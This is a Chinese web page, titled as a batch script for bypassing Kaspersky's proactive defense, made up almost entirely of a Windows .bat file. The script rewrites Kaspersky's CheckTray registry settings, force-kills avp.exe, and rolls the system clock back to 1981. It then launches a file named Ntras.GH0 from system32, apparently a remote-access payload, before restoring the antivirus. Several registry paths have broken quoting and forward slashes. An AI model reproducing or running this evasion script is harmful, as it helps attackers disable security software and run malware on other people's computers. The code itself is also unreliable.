绕过卡巴主动防御的批处理

@echo off
tasklist|findstr /i "avp.exe" && (

reg add HKEY_LOCAL_MACHINE/SOFTWARE/KasperskyLab/AVP6/settings/NSettings" /v "CheckTray" /t REG_DWORD /d 0 /f >nul
reg add HKEY_LOCAL_MACHINE/SOFTWARE/KasperskyLab/AVP6/settings/NSettings/Childs/0000" /v "CheckTray" /t REG_DWORD /d 0 /f >nul
reg add HKEY_LOCAL_MACHINE/SOFTWARE/KasperskyLab/AVP6/settings/NSettings/Childs/0000/Childs/0000" /v "CheckTray" /t REG_DWORD /d 0 /f >nul
reg add "HKEY_LOCAL_MACHINE/SOFTWARE/KasperskyLab/AVP6/settings/NSettings/Childs/0000/Childs/0001" /v "CheckTray" /t REG_DWORD /d 0 /f >nul
reg add "HKEY_LOCAL_MACHINE/SOFTWARE/KasperskyLab/AVP6/settings/NSettings/Childs/0000/Childs/0002" /v "CheckTray" /t REG_DWORD /d 0 /f >nul
reg add "HKEY_LOCAL_MACHINE/SOFTWARE/KasperskyLab/AVP6/settings/NSettings/Childs/0000/Childs/0003" /v "CheckTray" /t REG_DWORD /d 0 /f >nul
reg add "HKEY_LOCAL_MACHINE/SOFTWARE/KasperskyLab/AVP6/settings/NSettings/Childs/0000/Childs/0005" /v "CheckTray" /t REG_DWORD /d 0 /f >nul
reg add "HKEY_LOCAL_MACHINE/SOFTWARE/KasperskyLab/AVP6/settings/NSettings/Childs/0001" /v "CheckTray" /t REG_DWORD /d 0 /f >nul
reg add "HKEY_LOCAL_MACHINE/SOFTWARE/KasperskyLab/AVP6/settings/NSettings/Childs/0001/Childs/0000" /v "CheckTray" /t REG_DWORD /d 0 /f >nul
reg add "HKEY_LOCAL_MACHINE/SOFTWARE/KasperskyLab/AVP6/settings/NSettings/Childs/0001/Childs/0001" /v "CheckTray" /t REG_DWORD /d 0 /f >nul
reg add "HKEY_LOCAL_MACHINE/SOFTWARE/KasperskyLab/AVP6/settings/NSettings/Childs/0001/Childs/0002" /v "CheckTray" /t REG_DWORD /d 0 /f >nul
reg add "HKEY_LOCAL_MACHINE/SOFTWARE/KasperskyLab/AVP6/settings/NSettings/Childs/0001/Childs/0003" /v "CheckTray" /t REG_DWORD /d 0 /f >nul
reg add "HKEY_LOCAL_MACHINE/SOFTWARE/KasperskyLab/AVP6/settings/NSettings/Childs/0002" /v "CheckTray" /t REG_DWORD /d 0 /f >nul
reg add "HKEY_LOCAL_MACHINE/SOFTWARE/KasperskyLab/AVP6/settings/NSettings/Childs/0002/Childs/0000" /v "CheckTray" /t REG_DWORD /d 0 /f >nul
reg add "HKEY_LOCAL_MACHINE/SOFTWARE/KasperskyLab/AVP6/settings/NSettings/Childs/0002/Childs/0001" /v "CheckTray" /t REG_DWORD /d 0 /f >nul
reg add "HKEY_LOCAL_MACHINE/SOFTWARE/KasperskyLab/AVP6/settings/NSettings/Childs/0002/Childs/0002" /v "CheckTray" /t REG_DWORD /d 0 /f >nul
reg add "HKEY_LOCAL_MACHINE/SOFTWARE/KasperskyLab/AVP6/settings/NSettings/Childs/0002/Childs/0003" /v "CheckTray" /t REG_DWORD /d 0 /f >nul
reg add "HKEY_LOCAL_MACHINE/SOFTWARE/KasperskyLab/AVP6/settings/NSettings/Childs/0002/Childs/0004" /v "CheckTray" /t REG_DWORD /d 0 /f >nul
reg add "HKEY_LOCAL_MACHINE/SOFTWARE/KasperskyLab/AVP6/settings/NSettings/Childs/0003" /v "CheckTray" /t REG_DWORD /d 0 /f >nul
reg add "HKEY_LOCAL_MACHINE/SOFTWARE/KasperskyLab/AVP6/settings/NSettings/Childs/0003/Childs/0000" /v "CheckTray" /t REG_DWORD /d 0 /f >nul
reg add "HKEY_LOCAL_MACHINE/SOFTWARE/KasperskyLab/AVP6/settings/NSettings/Childs/0003/Childs/0001" /v "CheckTray" /t REG_DWORD /d 0 /f >nul
reg add "HKEY_LOCAL_MACHINE/SOFTWARE/KasperskyLab/AVP6/settings/NSettings/Childs/0003/Childs/0002" /v "CheckTray" /t REG_DWORD /d 0 /f >nul
reg add "HKEY_LOCAL_MACHINE/SOFTWARE/KasperskyLab/AVP6/settings/NSettings/Childs/0003/Childs/0003" /v "CheckTray" /t REG_DWORD /d 0 /f >nul
reg add "HKEY_LOCAL_MACHINE/SOFTWARE/KasperskyLab/AVP6/settings/NSettings/Childs/0003/Childs/0004" /v "CheckTray" /t REG_DWORD /d 0 /f >nul
reg add "HKEY_LOCAL_MACHINE/SOFTWARE/KasperskyLab/AVP6/settings/NSettings/Childs/0003/Childs/0005" /v "CheckTray" /t REG_DWORD /d 0 /f >nul
reg add "HKEY_LOCAL_MACHINE/SOFTWARE/KasperskyLab/AVP6/settings/NSettings/Childs/0003/Childs/0008" /v "CheckTray" /t REG_DWORD /d 0 /f >nul


ping -n 2 localhost >nul
taskkill /f /t /im avp.exe >nul
set date=%date% >nul
date 1981-01-01 >nul
ping -n 10 localhost > nul
start /b %systemroot%/system32/Ntras.GH0 >nul
date %date% >nul
for /f "skip=4 tokens=3-7" %%i in ('reg QUERY HKEY_LOCAL_MACHINE/SYSTEM/ControlSet001/Services/AVP /v ImagePath
') do (
set avpp=%%i %%j %%k %%l %%m
goto restart
)
:restart
ping -n 2 localhost >nul
start "" ""%avpp%"" >nul
reg add HKEY_LOCAL_MACHINE/SOFTWARE/KasperskyLab/AVP6/settings/NSettings" /v "CheckTray" /t REG_DWORD /d 1 /f >nul
reg add HKEY_LOCAL_MACHINE/SOFTWARE/KasperskyLab/AVP6/settings/NSettings/Childs/0000" /v "CheckTray" /t REG_DWORD /d 1 /f >nul
reg add HKEY_LOCAL_MACHINE/SOFTWARE/KasperskyLab/AVP6/settings/NSettings/Childs/0000/Childs/0000" /v "CheckTray" /t REG_DWORD /d 1 /f >nul
reg add "HKEY_LOCAL_MACHINE/SOFTWARE/KasperskyLab/AVP6/settings/NSettings/Childs/0000/Childs/0001" /v "CheckTray" /t REG_DWORD /d 1 /f >nul
reg add "HKEY_LOCAL_MACHINE/SOFTWARE/KasperskyLab/AVP6/settings/NSettings/Childs/0000/Childs/0002" /v "CheckTray" /t REG_DWORD /d 1 /f >nul
reg add "HKEY_LOCAL_MACHINE/SOFTWARE/KasperskyLab/AVP6/settings/NSettings/Childs/0000/Childs/0003" /v "CheckTray" /t REG_DWORD /d 1 /f >nul
reg add "HKEY_LOCAL_MACHINE/SOFTWARE/KasperskyLab/AVP6/settings/NSettings/Childs/0000/Childs/0005" /v "CheckTray" /t REG_DWORD /d 1 /f >nul
reg add "HKEY_LOCAL_MACHINE/SOFTWARE/KasperskyLab/AVP6/settings/NSettings/Childs/0001" /v "CheckTray" /t REG_DWORD /d 1 /f >nul
reg add "HKEY_LOCAL_MACHINE/SOFTWARE/KasperskyLab/AVP6/settings/NSettings/Childs/0001/Childs/0000" /v "CheckTray" /t REG_DWORD /d 1 /f >nul
reg add "HKEY_LOCAL_MACHINE/SOFTWARE/KasperskyLab/AVP6/settings/NSettings/Childs/0001/Childs/0001" /v "CheckTray" /t REG_DWORD /d 1 /f >nul
reg add "HKEY_LOCAL_MACHINE/SOFTWARE/KasperskyLab/AVP6/settings/NSettings/Childs/0001/Childs/0002" /v "CheckTray" /t REG_DWORD /d 1 /f >nul
reg add "HKEY_LOCAL_MACHINE/SOFTWARE/KasperskyLab/AVP6/settings/NSettings/Childs/0001/Childs/0003" /v "CheckTray" /t REG_DWORD /d 1 /f >nul
reg add "HKEY_LOCAL_MACHINE/SOFTWARE/KasperskyLab/AVP6/settings/NSettings/Childs/0002" /v "CheckTray" /t REG_DWORD /d 1 /f >nul
reg add "HKEY_LOCAL_MACHINE/SOFTWARE/KasperskyLab/AVP6/settings/NSettings/Childs/0002/Childs/0000" /v "CheckTray" /t REG_DWORD /d 1 /f >nul
reg add "HKEY_LOCAL_MACHINE/SOFTWARE/KasperskyLab/AVP6/settings/NSettings/Childs/0002/Childs/0001" /v "CheckTray" /t REG_DWORD /d 1 /f >nul
reg add "HKEY_LOCAL_MACHINE/SOFTWARE/KasperskyLab/AVP6/settings/NSettings/Childs/0002/Childs/0002" /v "CheckTray" /t REG_DWORD /d 1 /f >nul
reg add "HKEY_LOCAL_MACHINE/SOFTWARE/KasperskyLab/AVP6/settings/NSettings/Childs/0002/Childs/0003" /v "CheckTray" /t REG_DWORD /d 1 /f >nul
reg add "HKEY_LOCAL_MACHINE/SOFTWARE/KasperskyLab/AVP6/settings/NSettings/Childs/0002/Childs/0004" /v "CheckTray" /t REG_DWORD /d 1 /f >nul
reg add "HKEY_LOCAL_MACHINE/SOFTWARE/KasperskyLab/AVP6/settings/NSettings/Childs/0003" /v "CheckTray" /t REG_DWORD /d 1 /f >nul
reg add "HKEY_LOCAL_MACHINE/SOFTWARE/KasperskyLab/AVP6/settings/NSettings/Childs/0003/Childs/0000" /v "CheckTray" /t REG_DWORD /d 1 /f >nul
reg add "HKEY_LOCAL_MACHINE/SOFTWARE/KasperskyLab/AVP6/settings/NSettings/Childs/0003/Childs/0001" /v "CheckTray" /t REG_DWORD /d 1 /f >nul
reg add "HKEY_LOCAL_MACHINE/SOFTWARE/KasperskyLab/AVP6/settings/NSettings/Childs/0003/Childs/0002" /v "CheckTray" /t REG_DWORD /d 1 /f >nul
reg add "HKEY_LOCAL_MACHINE/SOFTWARE/KasperskyLab/AVP6/settings/NSettings/Childs/0003/Childs/0003" /v "CheckTray" /t REG_DWORD /d 1 /f >nul
reg add "HKEY_LOCAL_MACHINE/SOFTWARE/KasperskyLab/AVP6/settings/NSettings/Childs/0003/Childs/0004" /v "CheckTray" /t REG_DWORD /d 1 /f >nul
reg add "HKEY_LOCAL_MACHINE/SOFTWARE/KasperskyLab/AVP6/settings/NSettings/Childs/0003/Childs/0005" /v "CheckTray" /t REG_DWORD /d 1 /f >nul
reg add "HKEY_LOCAL_MACHINE/SOFTWARE/KasperskyLab/AVP6/settings/NSettings/Childs/0003/Childs/0008" /v "CheckTray" /t REG_DWORD /d 1 /f >nul
goto exit
)
:exit
echo 结束
pause>nul 
 

你可能感兴趣的:(Date,query)